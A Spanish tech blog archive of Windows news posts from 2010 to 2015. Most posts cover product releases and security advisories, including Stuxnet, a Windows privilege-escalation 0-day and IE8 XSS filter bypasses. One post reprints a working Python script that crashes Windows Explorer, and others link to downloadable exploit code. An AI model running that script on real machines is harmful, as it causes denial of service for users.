Mostrando las entradas con la etiqueta WINDOWS. Mostrar todas las entradas
Mostrando las entradas con la etiqueta WINDOWS. Mostrar todas las entradas

jueves, 25 de junio de 2015

Windows 10 será gratuito? Para quienes si y para quién no? una explicación breve


Windows 10 tiene planeada su fecha de lanzamiento para el 29 de Julio del  2015 y los usuarios de las versiones actuales de los sistemas operativos de Windows obtendrán una versión gratuita como actualización. Esto es lo que Microsoft ha notificado en diversas ocasiones desde Enero donde fue presentado el nuevo sistema operativo incluyendo Cortana, Project Spartan (nuevo Microsoft Edge), DirectX 12 y Hololens que al parecer corren bajo Windows 10.

¿Dónde está la confusión?
Desde ese anuncio, Micorsoft ha enviado señales mixtas (más de una) y los especuladores han acaparado los temas de cómo obtener una copia gratuita y quienes no lo podrán hacer, si los usuarios Insiders (beta testers) obtendrán un serial o no. A continuación veremos una lista de las diferentes vías para actualizar a Windows 10.

Windows 10 para Insiders.

Para los usuarios beta testers de Windows 10, Microsoft pone a su alcance una vía de actualización gratuita a la versión final RTM (Release to Manufacturing) por medio de actualizaciones, sin tener que iniciar una instalación desde cero de ésta nueva versión del Sistema Operativo.

Microsoft ha confirmado que las versiones originales de Windows 7 y 8 son candidatas para recibir la nueva actualización a Windows 10 genuina.

Si el usuario no cuenta con una versión genuina para actualizar, puede adquirir (comprar) la nueva versión. Para los usuarios beta testers podrán actualizar a Windows 10 RTM, pero las actualizaciones tendrán una caducidad sin embargo, pueden seguir actualizando y extendiendo el tiempo de la licencia indefinidamente.

Windows 10 para piratas.

Los usuarios que actualmente cuentan con versiones piratas de Windows 7 y 8 podrán actualizar el sistema operativo a Windows 10, sin embargo seguirán siendo piratas después del proceso de actualización, con las desventajas que eso conlleva.

Windows 10 para usuarios de Windows XP y Vista.

Windows XP fué liberado hace 13 años y ya no tiene soporte, no habrá mecanismo para actualizar esas versiones a Windows 10 directamente desde Windows Vista y XP; sin embargo, podrán instalar una copia limpia de Windows 10 desde cero. No habrá soporte gratuito para éstas versiones.

Windows 10 para usuarios de Windows 7, Windows 8 y 8.1

Windows 10 se ofrece como actualización gratuita para las versiones Windows 7 y Windows 8.1 para el primer año, una vez que el dispositivo se ha actualizado a Windows 10 éste será soportado durante el todo el tiempo de vida del dispositivo.

Usuarios de Windows 7 Starter, Home Basic, Premium and Windows 8.1 serán actualizados a Windows 10 Home.

Usuarios de Windows 7 Professional, Ultimate and Windows 8.1 Pro podrán actualizar a la versión Windows 10 Pro.

Las versiones Windows Phone 8.1 podrán actualizar a Windows 10 Mobile.

Windows Enterprise, Windows RT and Windows 8 no tendrán derecho para la actualización gratuita.

La intención de Microsoft es clara, acaparar la mayor parte de dispositivos más modernos con ésta nueva versión de Windows 10, si su dispositivo corre Windows 7 con buen rendimiento es un buen candidato para actualizar a Windows 10, pero si éste no tiene el rendimiento adecuado, la recomendación es ignorar ésta nueva actualización.

¿Qué pasa después del primer año?

Microsoft bajo Satya Nadella cambia rápidamente, y la tendencia es Windows as a Service. La compañía ya ha optado por cambiar en vez de grandes cambios de versiones (releases) a actualizaciones incrementales y pequeñas continuamente para todo el sistema operativo. Ellos dejan claro que ésta es tal vez, la última versión de Windows.

“Right now we’re releasing Windows 10, and because Windows 10 is the last version of Windows, we’re all still working on Windows 10,” said Jerry Nixon, a Microsoft Developer Evangelist.

Los usuarios de Windows 7 y 8.1 que decidan actualizar a Windows 10 seguirán tendiendo su copia genuina indefinidamente. Aunque cabe destacar que la oferta tendrá caducidad y después de ése tiempo tendrán que pagar por Windows 10.

Microsoft anunció los precios de Windows 10, y éstos serán los mismos que las últimas versiones 8.1 del sistema operativo, es decir, la versión Windows 10 estándar costará lo mismo que la versión Windows 8.1 $119 USD, y la versión Windows 10 Pro costará igual que la versión Windows 8.1 Pro $199 USD, el paquete Windows 10 Pro pack que permite actualizar de la versión Windows Home a la versión Windows 10 Pro costará $99 USD.


Windows as a Service.

Con el mercado cambiante de dispositivos como Xbox, PC's, tablets, phones, Hololens microsoft tiene una dura competencia y la tendencia es marcada por Google, Apple, Amazon, Facebook. Microsoft no se puede quedar atrás y se arriesga en el Mercado de SO como servicio un rompimiento al esquema que Microsoft ha sostenido por casi 3 décadas.

De momento no se puede predecir cuánto tiempo durará ésta tendencia, pero lo que viene para Windows 10 será la venta de aplicaciones por medio de Windows Store, una combinación de Windows 10 + Office 365, campañas de ventas por Bing, sofware en la nube, etc.

Hacer dinero de la gran cantidad de usuarios activos de Windows es un gran reto, pero el primer paso para la compañía es invitar a todos sus usuarios a adoptar la nueva plataforma Windows 10, la compañía lo entendió con el mercado mobile, no habrá dinero si nadie usa tu producto.

Fuente.

http://www.techspot.com/article/1002-windows-10-free-or-not-explained/

Obtener la versión Windows 10 Insider.
http://windows.microsoft.com/es-mx/windows/preview-faq

Alfonso Cruz

sábado, 12 de mayo de 2012

Unlock Root Android 2.1, 2.2, 2.3


Rootear Android es un proceso muy sencillo, con Unlock Root tenemos la posibilidad de instalar aplicaciones que requieren permisos de root (superusuario) y desde la aplicación podemos decidir, en qué momento conceder o denegar los permisos de root a cada app que instalemos en Android.

Además en compatible con los siguientes modelos:

  • HTC Sensation 
  • Galaxy Nexus (i9250) 
  • LG Optimus 3D (P920) 
  • HTC Wildfire S 
  • Galaxy Note (I9220) 
  • LG Optimus 2x 
  • HTC Desire S 
  • Galaxy S II (I9100) 
  • LG Optimus LET 
  • HTC Incredible S 
  • Galaxy S (I9000) 
  • LG Optimus Black 
  • LG Optimus PRO (c660h)
Entre otros.

Como se puede apreciar en la imagen de la aplicación, basta con Activar el modo de depuración USB (desde Ajustes/Aplicaciones/Desarrollo/Depuración USB) y conectarlo por medio de un cable USB a la computadora.

 Finalmente, al dar clic en el botón Root de Unlock Root comenzará el proceso de rooteo el cual finalizará después de algunos instantes y se reiniciará el celular con un nuevo icono de superuser en el menú de aplicaciones.

Se recomienda que antes de comenzar el proceso se aseguren de que el equipo cuente con la carga suficiente, y deben haber instalado los drivers de su equipo celular.

Enlace de descarga de Unlock Root
Compatible con: XP, Vista y Windows 7.

viernes, 30 de diciembre de 2011

Windows Explorer Denial Of Service (DOS)

# Windows 2008 SP2 RC2 Explorer Go Byebye :P
# Windows 7 Pro SP1 Explorer Go Byebye :P
# Interesting
# Brought to you by Level & z0r0 @ Smash The Stack

from win32com.shell import shell, shellcon
from os import mkdir

try:
mkdir("c:\\trigger_alt")
except:
print "[!] Trigger Directory Exists"
try:
mkdir("c:\\trigger_alt\\....")
except:
print "[!] Trigger Sub Directory Exists"

print "[!] Triggering Issue"

# This moves the directory containing the sub directory which creates the condition.
# The issue is in the function that moves the files to the recycle bin
# Replicate this using the following
# 1- mkdir c:\trigger_alt
# 2- cd c:\trigger_alt
# 3- mkdir ....\
# 4- My Computer -> c:\trigger_alt
# 5- Right Click -> Delete

shell.SHFileOperation((0,shellcon.FO_DELETE,'c:\\trigger_alt',None,shellcon.FOF_ALLOWUNDO|shellcon.FOF_NOCONFIRMATION))

miércoles, 23 de marzo de 2011

Windows Live Messenger 2011 15.4.3508.1109


Windows Live Messenger 2011 rompe por primera vez con el diseño clásico de Messenger hasta la fecha: una ventana con contactos con los que más tarde puedes interactuar.

En lugar de ello, la ventana de Windows Live Messenger 2011 se expande para aunar en un mismo espacio las actividades de tus contactos en redes sociales como Facebook o MySpace, así como tus contactos propiamente dichos. Nunca antes podías tener tan "controlados" a tus amigos.

No sorprende por tanto que el aspecto de Windows Live Messenger 2011, con pestañas incluidas, sea una de las principales novedades: incluso los emoticonos han sufrido un lavado de cara, con nuevos fichajes incluidos. Sin embargo, los cambios de Windows Live Messenger 2011 no terminan ahí.

Con Windows Live Messenger 2011, compartir datos con tus contactos es cosa de niños. Las fotografías (desde tu equipo, webs o álbumes online) se muestran en una agradable vista compartida. Además, no sólo podrás enviar clips de voz: ahora también puedes mandar clips de vídeo.

En definitiva, Windows Live Messenger 2011 es, por fin, una versión completamente nueva tanto en el aspecto como en el concepto, a la que sólo queda reprochar su incompatibilidad con Windows XP.

Ojo: La version 2011 no soporta windows xp.

martes, 4 de enero de 2011

Nuevos detalles de Windows 8 Milestone 2

Aunque Microsoft intenta llevar con el máximo discreción todo lo que gira alrededor del sistema operativo que sucederá a Windows 7, lo cierto es que se siguen conociendo nuevos detalles, el último, la versión Milestone 2 compilada de Windows 8. Microsoft podría revelar novedades esta misma semana en la feria CES.

Microsoft podría presentar, un año y medio después del lanzamiento de Windows 7, el sucesor de éste, Windows 8, durante la celebración de la feria CES 2011 (Consumer Electronics Show), que se celebra esta misma semana en Las Vegas.

Pero antes, el sitio web ruso, Winreviews.ru, ha publicado en su foro que Microsoft ya ha compilado la versión Milestone 2 de Windows 8. Ésta, "Windows 8 Milestone 2: 6.2.79xx.0.winmain_win8m2.xxxxxx-xxxx”, ya dejaría entrever algunas de las mejoras en las que Microsoft hará especial hincapié para esta nueva versión de su sistema operativo, como una interfaz notablemente mejorada gracias a la incorporación del primer sistema de escritorio 3D, conocido como Wind.

Habrá que permanecer atentos a CES 2011 para conocer qué sorpresas nos deparará Microsoft con Windows 8.

domingo, 26 de diciembre de 2010

Desbordamiento de memoria intermedia a través del servicio FTP en IIS 7.x

El investigador Matthew Bergin ha descubierto una vulnerabilidad en el servicio FTP integrado en la versión 7.5 de IIS en Windows 7. Ha hecho públicos todos los detalles del fallo y el código necesario para aprovecharlo.

El fallo se debe a un desbordamiento de memoria intermedia en la función 'OnSendData'. Este fallo podría ser aprovechado por un atacante remoto (sin necesidad de poseer usuario en ese FTP) para causar una denegación de servicio a través de peticiones de usuario especialmente manipuladas. Al tratarse de un desbordamiento de memoria intermedia podría llegar a permitir la ejecución de código arbitrario, pero de momento, no ha sido demostrado que pueda ser explotado con dicho fin.

Microsoft engloba dentro del "paquete" IIS, entre otros, al conocido servidor web IIS y un servidor FTP que no se instala por defecto. La versión 7.5 de IIS se encuentra disponible para Windows 2008 y Windows 7. Estrictamente hablando, no se trata de un 0 day, puesto que el fallo no ha sido detectado en ataques reales a sistemas. No se tiene constancia de que esté siendo aprovechado para vulnerar servidores.

No es la primera vez que el servicio FTP de IIS es vulnerado "por sorpresa". El 31 de agosto del 2009, Kingcope publicó también sin previo aviso, un exploit que permitía a un atacante remoto ejecutar código con permisos de SYSTEM en un servidor IIS 5.x. Este caso resultaba mucho más grave, aunque se limitaba a una versión relativamente antigua y bajo condiciones concretas (WebDAV).



Más Información:

Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC
http://www.exploit-db.com/exploits/15803/

viernes, 26 de noviembre de 2010

0 day: Elevación de privilegios en Microsoft Windows

Se ha publicado un nuevo 0 day en Microsoft Windows que permite a un usuario local obtener privilegios de SYSTEM (control total sobre el sistema) eludiendo cualquier control de usuario.

Los detalles técnicos se han hecho públicos, así como el código fuente y el programa necesarios para aprovechar el fallo. El exploit se aprovecha de la forma en la que el controlador win32k.sys procesa ciertos valores del registro. En concreto, el exploit manipula el valor SystemDefaultUEDCFont del registro y activa el soporte para EUDC (End-User-Defined-Characters) a través de la función EnableEUDC.

Esto quiere decir que el atacante debe crear una clave en el registro donde un usuario no administrador tiene privilegios para hacerlo. Luego intenta leerla, provoca el fallo en el driver y obtiene los privilegios. La prueba de concepto utiliza esta clave:

HKEY_USERS\[SID DEL USUARIO]\EUDC

La prueba de concepto funciona perfectamente en Windows Vista, 7 y 2008 totalmente parcheados. Tanto si el usuario pertenece al grupo de usuarios como al de administradores (incluso con la protección UAC activa), se obtendrán privilegios sin ningún tipo de advertencia por parte de Windows y por supuesto, sin necesidad de conocer la contraseña.

En Windows XP, la prueba de concepto no funciona (no existe por defecto esa rama del registro) pero es posible que la vulnerabilidad también le afecte. La prueba de concepto no es detectada por ningún motor en estos momentos:

http://www.virustotal.com/file-scan/report.html?id=59260532fe33547420613b0aa7b001aed3f565201e50f91558a16cf7465775f6-1290672402

Para que este fallo fuese aprovechado por un atacante o malware, primero debería acceder al sistema por cualquier otro medio y encontrarse con que no puede realizar los cambios que desea a causa de los permisos. Realmente, este no suele ser un impedimento para el malware masivo (puesto que el usuario medio suele o bien obviar el UAC o bien deshabilitarlo o bien en XP pertenecer al grupo de administradores). Sí que es posible que este fallo sea usado en ataques dirigidos o entornos profesionales, donde los usuarios de escritorio suelen tener privilegios limitados en el dominio.

Con este fallo, ya son dos problemas de elevación de privilegios que Microsoft debe arreglar. El fallo anterior fue descubierto en el cuerpo del famoso troyano Stuxnet. A través del programador de tareas, el malware era capaz de elevar privilegios en el equipo infectado. Hace algunos días los detalles de esta vulnerabilidad también se hicieron públicos.

El equipo de seguridad de Microsoft ha declarado en su twitter que está investigando el asunto. Un método para prevenir el problema hasta que exista parche oficial es limitar los permisos del usuario en la rama

HKEY_USERS\[SID DEL USUARIO]\EUDC

En el registro, se debe negar el permiso de escritura a los usuarios no administradores. Gráficamente, es sencillo (localizar el SID del usuario, botón derecho sobre la rama del registro y denegar).

Para automatizar el proceso, aconsejamos (aunque puede tener efectos secundarios, hágalo bajo su responsabilidad) utilizar subinacl.exe, una herramienta oficial de Microsoft descargable desde:

http://www.microsoft.com/downloads/en/details.aspx?FamilyID=e8ba3e56-d8fe-4a91-93cf-ed6985e3927b

Una vez instalada, localizar el SID del usuario (normalmente terminará en 1000) y el nombre de máquina y usuario con el comando:

whoami /user:

INFORMACIÓN DE USUARIO
----------------------

Nombre de usuario SID
==============================================
ordenador\usuario S-1-5-21-123456789-12345677889-123445678990-1000

y ejecutar:

subinacl.exe /subkeyreg "HKEY_USERS\
S-1-5-21-123456789-12345677889-123445678990-1000\EUDC" /deny=
ordenador\usuario=w

Esto evitará que el usuario pueda escribir en esa rama y por tanto la prueba de concepto no funcionará. Repetir para el resto de usuarios en el equipo si los hubiera.


Más Información:

POC:
http://www.exploit-db.com/sploits/uacpoc.zip

We 're investigating public PoC for a local EoP vuln requiring an
account on the target system
http://twitter.com/msftsecresponse

Original: http://www.hispasec.com/unaaldia/4415

ChevronWP7, primer 'jailbreak' para Windows Phone 7


Jailbreak limitado ya que los creadores dicen 'estar en contra de la piratería'

Un grupo de significados blogueros han publicado una herramienta denominada ChevronWP7 que permite ejecutar aplicaciones sin firmar en los terminales con el nuevo sistema operativo Windows Phone 7. Además, permite la creación de aplicaciones alternativas a las oficiales y sin necesidad de ser desarrollador oficial de Microsoft o lo que es lo mismo, sin pasar por caja abonando los 99 dólares que cuesta la licencia.

Ya está disponible la herramienta ChevronWP7, la primera –dicen- para el jailbreak de los terminales con la nueva plataforma móvil de Microsoft.

Jailbreak limitado ya que los creadores dicen ‘estar en contra de la piratería’ y por ello su herramienta ‘no permite romper la protección de las aplicaciones existentes en el MarketPlace’.

Más que eso permite aumentar el potencial de los terminales ejecutando homebrew, software de terceros sin firmar y sin pasar por la tienda en línea oficial de aplicaciones de Windows Phone 7.

Original de Vanguardia.com.mx

domingo, 14 de noviembre de 2010

Windows Live Messenger 8.5

Aquí les comparto el enlace de Windows Live Messenger 8.5 y además incluye el parche anti actualización para que puedan iniciar sesión sin problemas.



Verificados libre de virus.

Saludos.

domingo, 22 de agosto de 2010

Windows Live Messenger 2011 15.4.3002.810 Beta 2


Windows Live Messenger ahora con facebook y flicker.

Windows Live Messenger 2011 rompe por primera vez con el diseño clásico de Messenger hasta la fecha: una ventana con contactos con los que más tarde puedes interactuar.

En lugar de ello, la ventana de Windows Live Messenger 2011 se expande para aunar en un mismo espacio las actividades de tus contactos en redes sociales como Facebook o MySpace, así como tus contactos propiamente dichos. Nunca antes podías tener tan "controlados" a tus amigos.

No sorprende por tanto que el aspecto de Windows Live Messenger 2011, con pestañas incluidas, sea una de las principales novedades: incluso los emoticonos han sufrido un lavado de cara, con nuevos fichajes incluidos. Sin embargo, los cambios de Windows Live Messenger 2011 no terminan ahí.

Con Windows Live Messenger 2011, compartir datos con tus contactos es cosa de niños. Las fotografías (desde tu equipo, webs o álbumes online) se muestran en una agradable vista compartida. Además, no sólo podrás enviar clips de voz: ahora también puedes mandar clips de vídeo.

En definitiva, Windows Live Messenger 2011 es, por fin, una versión completamente nueva tanto en el aspecto como en el concepto, a la que sólo queda reprochar su incompatibilidad con Windows XP.
Cambios recientes en Windows Live Messenger:

* Pequeños cambios en la interfaz
* Corrección de errores
* Más rápido y consume menos recursos
* Chat con amigos de Facebook (no disponible en todos los países todavía)

Para utilizar Windows Live Messenger necesitas:

* Sistema operativo: WinVista/7

No compatible con windows xp

jueves, 19 de agosto de 2010

Windows Live Messenger 2011 15.4.3002.810 Beta



La mensajería y las redes sociales se unen en un unico programa


Windows Live Messenger 2011 rompe por primera vez con el diseño clásico de Messenger hasta la fecha: una ventana con contactos con los que más tarde puedes interactuar.

En lugar de ello, la ventana de Windows Live Messenger 2011 se expande para aunar en un mismo espacio las actividades de tus contactos en redes sociales como Facebook o MySpace, así como tus contactos propiamente dichos. Nunca antes podías tener tan "controlados" a tus amigos.

No sorprende por tanto que el aspecto de Windows Live Messenger 2011, con pestañas incluidas, sea una de las principales novedades: incluso los emoticonos han sufrido un lavado de cara, con nuevos fichajes incluidos. Sin embargo, los cambios de Windows Live Messenger 2011 no terminan ahí.

Con Windows Live Messenger 2011, compartir datos con tus contactos es cosa de niños. Las fotografías (desde tu equipo, webs o álbumes online) se muestran en una agradable vista compartida. Además, no sólo podrás enviar clips de voz: ahora también puedes mandar clips de vídeo.

En definitiva, Windows Live Messenger 2011 es, por fin, una versión completamente nueva tanto en el aspecto como en el concepto, a la que sólo queda reprochar su incompatibilidad con Windows XP.
Cambios recientes en Windows Live Messenger:

* Pequeños cambios en la interfaz
* Corrección de errores
* Más rápido y consume menos recursos
* Chat con amigos de Facebook (no disponible en todos los países todavía)

Para utilizar Windows Live Messenger necesitas:

* Sistema operativo: WinVista/7

No compatible con win xp
descargar aqui

miércoles, 18 de agosto de 2010

Microsoft actualiza su Windows Live 2011 beta



Microsoft liberó la actualización beta de su Windows Live Essentials 2011 para que los usuarios la descarguen y sigan aportando en la mejora del sitio.

A través de su blog oficial, Microsoft agradece las aportaciones y señala que para el Messenger recibió 3 millones de sugerencias de actualizaciones, 3.5 millones para el tema de imágenes, 6.2 millones para el de videollamadas y 7.6 millones para el estado del mail.

"Sus comentarios y su uso han contribuido a delinear las mejoras que hemos hecho y seguiremos haciendo en el Messenger, Photo Gallery, Movie Maker, Writer, Mail y protección infantil", señala Chris Jones, vicepresidente de Windows Live.

Algunas de las mejoras hasta el momento son:

* Disminuyó el tiempo para iniciar cada programa

* El Messenger es más rápido.

* La videollamada es más eficiente al utilizar un 30 por ciento menos de los recursos del CPU.

* La galería de fotos es mejor y baja más rápido.

* El Movie Maker logra cargas películas de mayor tamaño y mejor resolución.

* Writer ha mejorado significativamente la calidad de su corrección ortográfica y tiene una mejor integración con programas de Microsoft Office.

* El Gmail ha mejorado. Ahora se encarga de automatizar el spam y la carpeta de basura correctamente.

* El filtro de protección infantil es 35 por ciento más rápido.

"Además, hemos sido capaces de mejorar la calidad del software y hemos tomado en cuenta más del 75 por ciento de los errores reportados", menciona Jones, quien invita a los usuarios a bajar la actualización para probar los cambios y hacer sugerencias.

via eluniversal

descargar aqui

martes, 3 de agosto de 2010

Microsoft publica actualización fuera de ciclo para vulnerabilidad en los .lnk


Hoy no es el segundo martes del mes pero Microsoft acaba de publicar el boletín de seguridad MS10-046 de carácter crítico, en el que se soluciona la ya conocida vulnerabilidad relacionada con archivos LNK (accesos directos).

La publicación con carácter de urgencia se debe a que como ya habíamos anunciado se habían facilitado todos los detalles de la vulnerabilidad y además está siendo aprovechada de forma activa.


El problema afecta a Windows XP, Vista, Windows 7, Windows Server 2008 y Windows Server 2008 R2. Tal y como reconoce Microsoft, en la actualidad hay múltiples familias de malware que se aprovechan de esta vulnerabilidad y esta actualización protege contra cualquier intento de explotación.

Dada la gravedad de las vulnerabilidades se recomienda la actualización de los sistemas con la mayor brevedad posible, mediante Windows Update o descargando los parches, según versión, desde las direcciones facilitadas en el propio boletín de seguridad:


Descarga el parche de seguridad (crítico):


http://www.microsoft.com/technet/security/Bulletin/MS10-046.mspx

lunes, 19 de julio de 2010

Interesante (y peligroso) troyano que aprovecha un interesante (y peligroso) 0 day en Microsoft Windows

Se ha descubierto un nuevo ataque contra Windows, que aprovecha una vulnerabilidad previamente desconocida. Lo interesante (y peligroso) en este caso, es que esta vulnerabilidad ha sido utilizada como nuevo método "revolucionario" para eludir la desactivación de AutoRun y ejecutarse bajo cualquier circunstancia cuando se inserta en el sistema una memoria USB extraíble, por ejemplo. Además, el troyano ha sido firmado digitalmente por una compañía legítima.

Cómo ha sido descubierto

VirusBlokAda descubrió, ya el 17 de junio (lo que da una idea de la posible cantidad de tiempo que esta amenaza lleva atacando silenciosamente) módulos de un malware nuevo. Pasadas unas semanas, alertaron sobre algo realmente inusual en este troyano: su forma de propagarse a través de memorias USB prescindiendo del tradicional archivo autorun.inf, que permite la ejecución automática cuando se detecta un dispositivo extraíble y funcionalidad contra la que Microsoft lleva tiempo luchando.

El troyano usaba en cierta manera, una vulnerabilidad (para la que no existe parche) en archivos .LNK (accesos directos), que permite la ejecución de código aunque el AutoPlay y AutoRun se encuentren desactivados. A efectos prácticos, implica que se ha descubierto una nueva forma totalmente nueva de ejecutar código en Windows cuando se inserta un dispositivo extraíble, independientemente de que se hayan tomado todas las medidas oportunas conocidas hasta el momento para impedirlo.

Para qué estaba siendo usado

Independientemente de su método de propagación, el investigador Frank_Boldewin comenzó a analizar una de las muestras y descubrió que el objetivo del malware estaba dirigido específicamente contra sistemas SCADA WinCC de Siemens, que se ejecutan en Windows. Dentro de su código contenía la contraseña por defecto "2WSXcder" para la base de datos central del producto de Siemens, y al parecer el fabricante recomienda no modificarla. Por tanto el troyano conseguía acceso de administración de la base de datos. Los sistemas "Supervisory Control and Data Acquisition (SCADA)" son programas críticos de producción industrial: toman datos muy sensibles de sensores de una fábrica, por ejemplo, y los envían a un sistema central para ser controlados. Se usan en grandes plantas de tratamiento de aguas, control eléctrico, de tráfico... Por tanto, se trata de un malware destinado a un perfil muy diferente del usuario "medio". En otras palabras, malware para al espionaje industrial. Se está usando sobre todo en Indonesia, India e Irán.

Un malware muy profesional

El troyano se esconde con habilidades de rootkit para pasar desapercibido en los sistemas en los que consigue instalarse. Llama la atención, como se ha mencionado, el uso de una vulnerabilidad desconocida hasta ahora en los accesos directos, lo que da una nueva vuelta de tuerca a la pesadilla del AutoRun para Microsoft. Lejos de usar el tradicional autorun.inf (contra el que ya se puso remedio), se propaga en llaves USB en forma de archivos del tipo ~WTR4132.tmp, por ejemplo. Se parecen mucho a los ficheros temporales de Word que usa Office internamente cuando un fichero está en uso.

Para colmo, el troyano utiliza para su funcionalidad de rootkit unos drivers firmados digitalmente por la famosa empresa china Realtek. Esto significa que, en principio, solo Realtek puede ser responsable de ese código... excepto que su clave privada haya sido comprometida de alguna forma, cosa que no se ha confirmado todavía. En cualquier caso, Microsoft, muy acertadamente, ha trabajado con Verisign para revocar en sus sistemas los certificados (con el apoyo de Realtek también). Esto quiere decir que los sistemas bien configurados (que no puedan instalar drivers no firmados o firmados con certificados revocados) no sufrirán este problema... eso sí, tendrán que actualizar su lista de certificados a través de windowsupdate.com.

El uso de certificados legítimos es de lo más interesante para un malware, y lo hace una pieza casi única. Otros troyanos han sido firmados antes, pero no nos consta que se haya realizado la firma con un certificado válido de una empresa reconocida.

Y ahora qué

Pues este malware pone de nuevo sobre la mesa las posibilidades de la creación de troyanos específicos, de amenazas personalizadas y "trabajadas" convenientemente para pasar desapercibidas. O sea: usando vulnerabilidades no conocidas, criptografía, rootkits....

Tarde o temprano los detalles técnicos sobre la vulnerabilidad en accesos directos saldrán a la luz, y todo tipo de malware comenzará a usar este nuevo método para propagarse por llaves USB. Recordemos el éxito de Conficker en octubre de 2009, que también encontró una forma de eludir la desactivación de AutoRun en Windows (gracias a una modificación en autorun.inf que no se tuvo en cuenta) y que obligó a Microsoft a modificar toda su filosofía en este sentido y desactivar (se creía que de forma eficaz hasta ahora) por completo el dichoso AutoRun.

Microsoft ha publicado un alerta reconociendo la vulnerabilidad y recomendando estas contramedidas:

* Poner en blanco el valor predeterminado (default) de la rama del registro:
HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler

* Detener y deshabilitar el servicio "cliente web" (WebClient).

Además, lo de siempre: no usar la cuenta de administrador, mantenerse informado, no usar memorias USB no confiables y mantener actualizado el sistema y el antivirus.


The Stuxnet Sting
http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx

Rootkit.TmpHider
http://www.wilderssecurity.com/showpost.php?p=1712134&postcount=22

Vis Hispasec

jueves, 22 de abril de 2010

El filtro XSS de Internet Explorer 8 sigue siendo vulnerable

Los investigadores Eduardo Vela y David Lindsay han presentado, en el marco de la conferencia Black Hat Europa de este año, un nuevo método para ejecutar ataques de cross-site scripting a través de los filtros XSS de Internet Explorer 8.

Microsoft introdujo un mecanismo para filtrar ataques de cross-site scripting, concretamente los de "tipo 1" o no persistentes. Un cross-site scripting no persistente es la clase de ataque más común y extendida de este tipo de ataques.

El atacante manipula una URL insertando código malicioso que, de manera errónea, aprovechando una vulnerabilidad, el sitio web usará para generar una página que contendrá el código legítimo más el código introducido por el atacante.

La víctima que "inadvertidamente" use la URL proporcionada por el atacante, enviará una petición hacia el servidor web y este "reflejará" el código de vuelta hacia el cliente donde es usado por el navegador como si fuese código legítimo.

Es denominado no persistente ya que el servidor no almacena el código malicioso y es reflejado porqué en realidad es el mismo navegador el que va a enviar el ataque a través de la petición HTTP hacia el servidor web y éste de vuelta al navegador de la víctima.

La idea general del filtro XSS de Internet Explorer, es observar la secuencia solicitud-respuesta entre navegador y sitio web. A grandes rasgos, modifica el código que se recibe del servidor antes de que sea interpretado por el navegador, si detecta que la página recibida contiene código sospechoso enviado en una de las solicitudes del navegador. Básicamente, evita "reflejar" el código malicioso.

La base del mecanismo de neutralización de ataques del filtro es alterar el código malicioso. En caso de observar código sospechoso de vuelta al navegador, el filtro actúa antes de que se interprete la página, insertando o reemplazando caracteres en partes de ese código para impedir su ejecución transformándolo en código no válido.

Ya en su momento se hizo público una vulnerabilidad que aprovechaba el filtro XSS para producir este tipo de ataques. Microsoft liberó un boletín (MS10-002) en el que se corregía la vulnerabilidad. Aun así, se encontraron nuevas formas para revertir el uso del filtro y Microsoft volvió a reforzarlo en un nuevo boletín (MS10-018).

Lo que han mostrado los investigadores es que es no solo es posible evadir el filtro sino que sigue siendo posible efectuar ataques de cross-site scripting, incluso en sitios webs que no son vulnerables. Adicionalmente, el filtro también podría ser usado por el atacante para impedir la ejecución de scripts legítimos, posibilitando la evasión de mecanismos de seguridad propios del sitio web visitado.

David Ross de Microsoft, ha confirmado que publicarán un parche hacia el mes de junio para prevenir este tipo de ataque.

Más Información:

Abusing IE8s XSS Filters [PDF]
http://p42.us/ie8xss/Abusing_IE8s_XSS_Filters.pdf

Guidance on Internet Explorer XSS Filter
http://blogs.technet.com/msrc/archive/2010/04/19/guidance-on-internet-explorer-xss-filter.aspx

jueves, 11 de marzo de 2010

Nuevo 0-day en Microsoft Internet Explorer

Microsoft informa de una vulnerabilidad en el navegador Internet Explorer que podría permitir a un atacante remoto ejecutar código arbitrario, con los permisos del usuario, a través de un sitio web especialmente manipulado.

La vulnerabilidad, a la que se le ha asignado el CVE-2010-0806, se encuentra en "iepeers.dll" y está causada por un puntero inválido al que se podría acceder, bajo ciertas condiciones, tras liberar el objeto apuntado.

Microsoft ha detectado y confirma que la vulnerabilidad está siendo explotada activamente. Se consideran vulnerables las versiones 6 y 7.

Se recomienda seguir las indicaciones de Microsoft a fin de minimizar el impacto. Microsoft está trabajando para publicar un parche que solucione esta vulnerabilidad.


Más Información:

Microsoft Security Advisory (981374)
http://www.microsoft.com/technet/security/advisory/981374.mspx

Security Advisory 981374 Released (blog MSRC)
http://blogs.technet.com/msrc/archive/2010/03/09/security-advisory-981374-released.aspx

domingo, 7 de marzo de 2010

Descubren un fallo en Windows con una década de antigüedad

Se ha encontrado una vulnerabilidad crítica en Windows que compromete todas las versiones del sistema operativo de Microsoft desde 2000.

La empresa 2X Software afirma haber encontrado una vulnerabilidad en el sistema operativo de Microsoft que podría utilizarse para realizar ataques de denegación de servicio en las ediciones de Windows de la última década.
Se trata, en opinión de la compañía, de un gran problema que pone en riesgo a decenas de millones de ordenadores de todo el mundo. “Este tipo de vulnerabilidad deja a los usuarios abiertos a ataques de denegación de servicio que pueden ser devastadores”, afirman desde 2X Software.
Según la compañía, Windows 2000, Windows XP (y XP Embedded), Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2 son vulnerables. Desde Microsoft han anunciado que están comprobando la información.


FUENTE: Itexpresso

martes, 2 de marzo de 2010

Alerta con Microsoft Essencials 2010


Salta la alerta, de un nuevo antivirus que es un fake.. es decir, que no es un antivirus sino que detrás esconde el troyano Win32/Fakeinit (TrojanDownloader:Win32/Fakeinit description.). Este antivirus, se llama Microsoft Essencials 2010, aprovechando la aceptación del antivirus que sacó microsoft, llamado Microsoft Essencials.

Este troyano, simula la actualización de Flash Player, para descargar de modo silencioso otros programas maliciosos que irán mostrando diferentes tipos de advertencias como que el equipo está infectado, cambiando el fondo de pantalla y interceptando ciertas webs para mostrarte información de que el PC está infectado, para que descargemos e instalemos este antivirus.
Una vez instalado Security Essentials 2010, se ejecuta mostrando falsas infecciones, comentando que no puede limpiarlo y que debe de comprar la versión completa del antivirus para poder limpiarlo.

sábado, 27 de febrero de 2010

En marzo morirá Internet Explorer 6


Luego de una serie de vulnerabilidades y falta de compatibilidad con cientos de páginas web, finalmente el explorador Internet Explorer 6 ha llegado a su fin.

